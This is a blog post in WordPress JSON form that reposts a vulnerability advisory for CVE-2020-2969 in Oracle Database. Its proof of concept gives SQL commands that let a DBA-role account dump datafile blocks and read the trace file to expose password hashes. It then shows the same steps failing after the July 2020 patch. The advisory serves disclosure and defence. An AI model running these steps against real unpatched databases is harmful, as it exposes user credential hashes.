{"id":57388,"date":"2024-06-11T17:10:30","date_gmt":"2024-06-11T14:10:30","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179027\/oraclepasswordhash-disclose.txt"},"modified":"2024-06-11T17:10:30","modified_gmt":"2024-06-11T14:10:30","slug":"oracle-database-password-hash-unauthorized-access","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/oracle-database-password-hash-unauthorized-access\/","title":{"rendered":"Oracle Database Password Hash Unauthorized Access"},"content":{"rendered":"

Title: CVE-2020-2969 \u2013 Unauthorized Access to Password Hashes by Account with DBA role
Product: Database
Manufacturer: Oracle
Affected Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c
Tested Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c
Risk Level: Medium
Solution Status: Fixed
CVE Reference: CVE-2020-2969
Base Score: 6.6
Author of Advisory: Emad Al-Mousa<\/p>\n

*****************************************
Vulnerability Details:<\/p>\n

Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump.<\/p>\n

The presented scenarios illustrates that an account with \u201cDBA\u201d role can still view\/extract the password hashes although the account can\u2019t directly query SYS.USER$ table as a security enhancement since \u201cselect any dictionary\u201d system privilege doesn\u2019t provide access to SYS.USER$ anymore<\/p>\n

*****************************************
Proof of Concept (PoC):<\/p>\n

This simulation was performed in Oracle Non-CDB environment, and is applicable of course in CDB setup also.<\/p>\n

SQL> create user ninja identified by hello_123;<\/p>\n

SQL> grant create session to ninja;<\/p>\n

SQL> grant dba to ninja;<\/p>\n

SQL> alter user ninja default role all;<\/p>\n

*** when attempting to select from SYS.USER$ the account will not be able since the system privilege \u201cSELECT ANY DICTIONARY\u201d is changed by restricting direct access to multiple SYS tables such as USER$, ENC$,DEFAULT_PWD$, LINK$, USER_HISTORY$, CDB_LOCAL_ADMINAUTH$<\/p>\n

SQL> select * from sys.user$;
select * from sys.user$
*
ERROR at line 1:
ORA-01031: insufficient privileges<\/p>\n

** I will perform dump to the system data file to gain access to the hashed passwords<\/p>\n

SQL> alter system dump datafile 1 block min 210 block max 215;<\/p>\n

** Then immediately I will check the generated trace file name using the query:<\/p>\n

SQL> select * from v$diag_info where NAME=’Default Trace File’;<\/p>\n

** I will query the \u201cpayload\u201d column of the view V$DIAG_TRACE_FILE that will read the generated trace file contents:<\/p>\n

SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME=’ORCLCDB_ora_6029.trc’;<\/p>\n

\/\/ the password hash will be exposed in the trace file !<\/p>\n

After applying Oracle July 2020 CPU patches- try to re-simulate again:<\/p>\n

SQL> create user ninja identified by hello_123;<\/p>\n

SQL> grant create session to ninja;<\/p>\n

SQL> grant dba to ninja;<\/p>\n

SQL> alter user ninja default role all;<\/p>\n

SQL> show user
USER is “NINJA”<\/p>\n

SQL> select * from sys.user$;
select * from sys.user$
*
ERROR at line 1:
ORA-01031: insufficient privileges<\/p>\n

SQL> alter system dump datafile 1 block min 210 block max 215;
alter system dump datafile 1 block min 210 block max 215
*
ERROR at line 1:
ORA-01031: insufficient privileges<\/p>\n

SQL> select * from v$diag_info where NAME=’Default Trace File’;<\/p>\n

INST_ID NAME
———- —————————————————————-
VALUE
——————————————————————————–
CON_ID
———-
1 Default Trace File
\/exp\/ora5\/diagnostic\/diag\/rdbms\/ora5\/ora5\/trace\/ora5_ora_1171
16.trc<\/p>\n

SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME=’ora5_ora_117116.trc’;<\/p>\n

PAYLOAD
——————————————————————————–
Trace file
\/exp\/ora5\/diagnostic\/diag\/rdbms\/ora5\/ora5\/trace\/ora5_ora_1171
16.trc<\/p>\n

Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 – Production
Version 19.8.0.0.0
Build label: RDBMS_19.8.0.0.0DBRU_LINUX.X64_200702
ORACLE_HOME: \/oraclex\/oradbp05\/product\/19.3
System name: Linux
Node name: boba
Release: 3.10.0-1127.13.1.el7.x86_64
Version: #1 SMP Fri Jun 12 14:34:17 EDT 2020<\/p>\n

PAYLOAD
——————————————————————————–
Machine: x86_64
Instance name: ora5
Redo thread mounted by this instance: 1
Oracle process number: 69
Unix process pid: 117116, image: oracle@boba (TNS V1-V3)<\/p>\n

*** 2020-07-16T11:09:31.240875+03:00<\/p>\n

*** SESSION ID:(1174.5281) 2020-07-16T11:09:31.240917+03:00
*** CLIENT ID:() 2020-07-16T11:09:31.240926+03:00<\/p>\n

PAYLOAD
——————————————————————————–
*** SERVICE NAME:(SYS$USERS) 2020-07-16T11:09:31.240932+03:00
*** MODULE NAME:(SQL*Plus) 2020-07-16T11:09:31.240938+03:00
*** ACTION NAME:() 2020-07-16T11:09:31.240943+03:00
*** CLIENT DRIVER:(SQL*PLUS) 2020-07-16T11:09:31.240948+03:00<\/p>\n

Error: file 1 can only be dumped with SYSDBA privillege<\/p>\n

*****************************************
References:
https:\/\/www.oracle.com\/security-alerts\/cpujul2020.html
https:\/\/www.oracle.com\/security-alerts\/cpujul2020verbose.html
https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2020-2969
https:\/\/databasesecurityninja.wordpress.com\/2024\/06\/10\/cve-2020-2969-unauthorized-access-to-password-hashes-by-account-with-dba-role\/<\/p>\n","protected":false},"excerpt":{"rendered":"

Title: CVE-2020-2969 \u2013 Unauthorized Access to Password Hashes by Account with DBA roleProduct: DatabaseManufacturer: OracleAffected Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19cTested Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19cRisk Level: MediumSolution Status: FixedCVE Reference: CVE-2020-2969Base Score: 6.6 Author of Advisory: Emad Al-Mousa *****************************************Vulnerability Details: Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57388","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57388"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57388\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}